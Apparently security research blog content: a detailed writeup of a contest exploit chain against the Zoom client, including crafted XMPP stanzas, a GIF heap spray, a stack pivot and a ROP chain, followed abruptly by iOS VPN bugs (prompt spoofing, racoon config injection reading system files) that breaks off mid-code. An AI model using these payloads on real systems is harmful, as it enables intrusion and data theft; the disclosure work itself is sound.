We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.
Before we go further, lets look at what defensive measures we had to deal with:
ASLR (Address Space Layout Randomization). This means that DLLβs are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLLβs and for the heap.
DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.
We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLLβs did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.
CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.
Not enabling CFG for a dll means two things:
Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
Any dynamic function call from another library which does use CFG which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.
Based on this, we formed the following plan:
Leak an address from one of the two OpenSSL DLLβs to deal with ASLR.
Overflow a vtable or function pointer to point to a location in the DLL we have located.
Use a ROP chain to gain arbitrary code execution.
To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then freeing all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.
By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didnβt allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.
The following video shows the βdangerousβ objects we donβt want to overwrite in orange, and the safe objects we created in green:
As long as Bucket 3 didnβt fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new βorangeβ objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.
Step 10: Info leak
Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.
We took a good look at the parts we had code for, and we found a method, although it was tricky.
When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.
We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.
A stanza for requesting another user to be added to your contact list:
<presencexmlns="jabber:client"type="subscribe"email="[email of other user]"from="[email protected]/ZoomChat_pc"><status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status></presence>
The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:
<presencefrom="[email protected]/ZoomChat_pc"to="[email protected]/ZoomChat_pc"type="probe"><zoomxmlns="zm:x:group"group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw"action="add_member"option="0"diff="0:1"><members><memberfname="SurveyMonkey"lname=""jid="[email protected]"type="1"cmd="/sm"pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"introduction="Manage SurveyMonkey surveys from your Zoom chat channel."signature=""extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/></members></zoom></presence>
While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the userβs contact list. So combining these two things, we ended up with the following:
<presencefrom="[email protected]/ZoomChat_pc"to="[email protected]/ZoomChat_pc"><zoomxmlns="zm:x:group"group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw"action="add_member"option="0"diff="0:0"><members><memberfname="SurveyMonkey"lname=""jid="[email protected]"type="1"cmd="/sm"pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"introduction="Manage SurveyMonkey surveys from your Zoom chat channel."signature=""extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/></members></zoom></presence>
The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:
Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.
We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.
Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak was unlikely to consist of entirely printable characters, we couldnβt try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.
Our plan was to do the following:
Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
Accept the connection, but delay responding to the TLS handshake.
Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
Let the TLS handshake proceed.
Receive the query, with the heap header and start of the next block in the HTTP request.
This video illustrates how this works:
In essence, this similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.
This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).
typedefstruct{/* Digest to use for PRF */constEVP_MD*md;/* Secret value to use for PRF */unsignedchar*sec;size_tseclen;/* Buffer of concatenated seed data */unsignedcharseed[TLS1_PRF_MAXBUF];size_tseedlen;}TLS1_PRF_PKEY_CTX;
There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:
This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but itβs not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.
We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.
The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:
One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotation, and even if you want to renegotiate thousands of times without ever sending a HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.
The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.
Step 11: Control
The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom, only then the destructor would call some vtable functions.
classFileWrapperImpl:publicFileWrapper{public:FileWrapperImpl();~FileWrapperImpl()override;intFileName(char*file_name_utf8,size_tsize)constoverride;boolOpen()constoverride;intOpenFile(constchar*file_name_utf8,boolread_only,boolloop=false,booltext=false)override;intOpenFromFileHandle(FILE*handle,boolmanage_file,boolread_only,boolloop=false)override;intCloseFile()override;intSetMaxFileSize(size_tbytes)override;intFlush()override;intRead(void*buf,size_tlength)override;boolWrite(constvoid*buf,size_tlength)override;intWriteText(constchar*format,...)override;intRewind()override;private:intCloseFileImpl();intFlushImpl();std::unique_ptr<RWLockWrapper>rw_lock_;FILE*id_;boolmanaged_file_handle_;boolopen_;boollooping_;boolread_only_;size_tmax_size_in_bytes_;// -1 indicates file size limitation is off
size_tsize_in_bytes_;charfile_name_utf8_[kMaxFileNameSize];};
Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didnβt affect anything yet if those objects are unused, but if we tried to exit could cause a crash due to destructors or freeing.
Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you donβt expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.
With a emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.
This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?
Step 12: GIPHY time
We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we donβt know for sure where our heap allocations end up. To deal with this, we used GIFs.
To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.
In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.
A normal GIPHY message:
<messagexmlns="jabber:client"to="[email protected]"id="{62BFB8B6-9572-455C-B440-98F532517177}"type="chat"from="[email protected]/ZoomChat_pc"><body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body><thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread><activexmlns="http://jabber.org/protocol/chatstates"/><sns><format>%1$@ sent you an image</format><args><arg>John Doe</arg></args></sns><zmext><msg_type>12</msg_type><fromn="John Doe"res="ZoomChat_pc"/><to/><visible>true</visible><msg_feature>16384</msg_feature></zmext><giphyv2id="YQitE4YNQNahy"url="https://giphy.com/gifs/YQitE4YNQNahy"tags="hacker"><pcInfourl="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX"size="1456787"/><mobileInfourl="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk"size="549356"/><bigPicInfourl="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi 1aWl62KifvJ_LDECBM1"size="4322534"/></giphyv2></message>
A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):
<messagexmlns="jabber:client"to="[email protected]"id="{62BFB8B6-9572-455C-B440-98F532517177}"type="chat"from="[email protected]/ZoomChat_pc"><body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body><thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread><activexmlns="http://jabber.org/protocol/chatstates"/><sns><format>%1$@ sent you an image</format><args><arg>John Doe</arg></args></sns><zmext><msg_type>12</msg_type><fromn="John Doe"res="ZoomChat_pc"/><to/><visible>true</visible><msg_feature>16384</msg_feature></zmext><giphyv2id="YQitE4YNQNahy"url="https://giphy.com/gifs/YQitE4YNQNahy"tags="hacker"><pcInfourl="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX"size="1456787"/><mobileInfourl="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk"size="549356"/><bigPicInfourl="https://file.zoom.us/external/link/issue/../../../file/[file_id]"size="4322534"/></giphyv2></message>
Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably βguessβ that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.
Step 13: Pivot into ROP
Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.
We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the address of the stack pointer to point to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:
pushedi; # points to vtable pointer (memory we control)
popesp; # now the stack pointer points to memory under our control
popedi; # pop some extra registers
popesi;
popebx;
popebp;
ret
This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.
From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we donβt have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:
Call GetModuleHandleW to get the base address of kernel32.dll.
Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
Call that address to make the GIF data executable.
Jump to the shellcode offset in the GIF.
In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain stats by calling GetModuleHandleW with as argument the string "kernel32.dll" from our GIF file. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.
In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):
# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; retSTACK_PIVOT=crypto_base+0x441e9GIF_BASE=0x462bc020VTABLE=GIF_BASE+0x1c# Start of the correct vtableSHELLCODE=GIF_BASE+0x7fd# Location of our shellcodeKERNEL32_STR=GIF_BASE+0x6c# Location of UTF-16 Kernel32.dll stringVIRTUALPROTECT_STR=GIF_BASE+0x86# Location of VirtualProtect stringKNOWN_MAPPED=0x2fe451e4JMP_GETMODULEHANDLEW=crypto_base+0x1c5c36# jmp GetModuleHandleWJMP_GETPROCADDRESS=crypto_base+0x1c5c3c# jmp GetProcAddressRET=crypto_base+0xdc28# retPOP_RET=crypto_base+0xdc27# pop ebp; retADD_ESP_24=crypto_base+0x6c42e# add esp, 0x18; retPUSH_EAX_STACK=crypto_base+0xdbaa9# mov dword ptr [esp + 0x1c], eax; call ebxPOP_EBX=crypto_base+0x16cfc# pop ebx; retJMP_EAX=crypto_base+0x23370# jmp eaxrop_stack=[VTABLE,# pop ediGIF_BASE+0x101f4,# pop esiGIF_BASE+0x101f4,# pop ebxKNOWN_MAPPED+0x20,# pop ebpJMP_GETMODULEHANDLEW,POP_EBX,KERNEL32_STR,ADD_ESP_24,PUSH_EAX_STACK,0x41414141,POP_RET,# Not used, padding for other objects0x41414141,0x41414141,0x41414141,JMP_GETPROCADDRESS,JMP_EAX,KNOWN_MAPPED+0x10,# This will be overwritten with the base address of Kernel32.dllVIRTUALPROTECT_STR,SHELLCODE,SHELLCODE&0xfffff000,0x1000,0x40,SHELLCODE-8,]
And thatβs it! We now had a reverse shell and could launch calc.exe.
Reliability, reliability, reliability
The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.
There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldnβt and decreasing the chance that the client would crash when we had overwritten something we didnβt intend to.
In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.
In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.
What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.
Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.
In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.
In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.ddl in one run and then skip the info leak in the next run (the locations of ASLR randomized dlls remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.
Conclusion
After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attackerβs screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.
In total we spend around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.
We would like to thank ZDI and Zoom for organizing this yearβs event, and hopefully see you guys next year!
Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.
For VPNs there are actually three variants that a Network Extension can implement: a βPersonal VPNβ, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the code for the VPN itself, either as βPacket Tunnel Providerβ or βApp Proxy Providerβ. we did not spend any time on the latter two, but only investigated Personal VPNs.
To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.
Bug 1: App spoofing
To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:
It turns out that the permission prompt used that name, instead of the actual name of the app that the user would be familiar with. Because that is part of an object received from the app, this means that it could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could even attempt to obfuscate what the prompt is actually asking. For example, making it seem like a prompt about installing a software update (where users would expect to enter their passcode).
It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.
So, by calling these private methods:
NEVPNManager*manager=[NEVPNManagersharedManager];...NEConfiguration*configuration=[managerconfiguration];[configurationsetApplication:nil];[configurationsetApplicationName:@"New Network Settings for 4G"];[managersaveToPreferencesWithCompletionHandler:^(NSError*error){...}];
This results in the following permission prompt:
And this configuration is not automatically removed when uninstalling the app.
IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:
Important Note
The development of ipsec-tools has been ABANDONED.
ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!
Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.
While playing around with the configuration options, we noticed a strange error whenever we included a " character in the βGroup nameβ or βAccount Nameβ values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.
Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.
One interesting option that did work was the following:
A"; my_identifier keyid file "/etc/master.passwd
This results in the following line in the configuration file:
This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:
Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:
/var/root/Library/
/private/etc/
/Library/Preferences/
There is, however, an important limitation. The group name is added to the initial handshake message. This packet is sent over UDP, therefore, the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any files larger than 65,535 bytes, subtracting the overhead for the rest of the packet, IP and UDP header, can not be read.
For example, following files were found to often be below the limit and may sensitive information that would normally not be available to an app:
By exploiting this issue, a Network Extension app could read from files that would normally not be allowed due to the app sandbox. Other potential impact could be accessing Keychain items or deleting files on those directories by changing the pid file location.
Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.
Bug 3: OOB reads (CVE-2020-9837)
As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era even being used for a jailbreak), but likely because there is no upstream project, these fixes were often not correct or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.
A common pattern in racoon for parsing packets containing a list of elements is to do the following. The start of the list is cast to a struct with the same representation as the element header (d). A variable keeps track of the remaining length of the buffer (tlen). Then, a loop is started. In each iteration, it handles the current element. Then it advances the struct to the next value and it decreases the number of remaining bytes with the size of the current element. If that number becomes negative or zero, the loop ends.
/*
* get ISAKMP data attributes
*/staticintt2isakmpsa(trns,sa)structisakmp_pl_t*trns;structisakmpsa*sa;{structisakmp_data*d,*prev;intflag,type;interror=-1;intlife_t;intkeylen=0;vchar_t*val=NULL;intlen,tlen;u_char*p;tlen=ntohs(trns->h.len)-sizeof(*trns);prev=(structisakmp_data*)NULL;d=(structisakmp_data*)(trns+1);/* default */life_t=OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;sa->lifetime=OAKLEY_ATTR_SA_LD_SEC_DEFAULT;sa->lifebyte=0;sa->dhgrp=racoon_calloc(1,sizeof(structdhgroup));if(!sa->dhgrp)gotoerr;while(tlen>0){type=ntohs(d->type)&~ISAKMP_GEN_MASK;flag=ntohs(d->type)&ISAKMP_GEN_MASK;plog(ASL_LEVEL_DEBUG,"type=%s, flag=0x%04x, lorv=%s\n",s_oakley_attr(type),flag,s_oakley_attr_v(type,ntohs(d->lorv)));/* get variable-sized item */switch(type){caseOAKLEY_ATTR_GRP_PI:caseOAKLEY_ATTR_GRP_GEN_ONE:caseOAKLEY_ATTR_GRP_GEN_TWO:caseOAKLEY_ATTR_GRP_CURVE_A:caseOAKLEY_ATTR_GRP_CURVE_B:caseOAKLEY_ATTR_SA_LD:caseOAKLEY_ATTR_GRP_ORDER:if(flag){/*TV*/len=2;p=(u_char*)&d->lorv;}else{/*TLV*/len=ntohs(d->lorv);if(len>tlen){plog(ASL_LEVEL_ERR,"invalid ISAKMP-SA attr, attr-len %d, overall-len 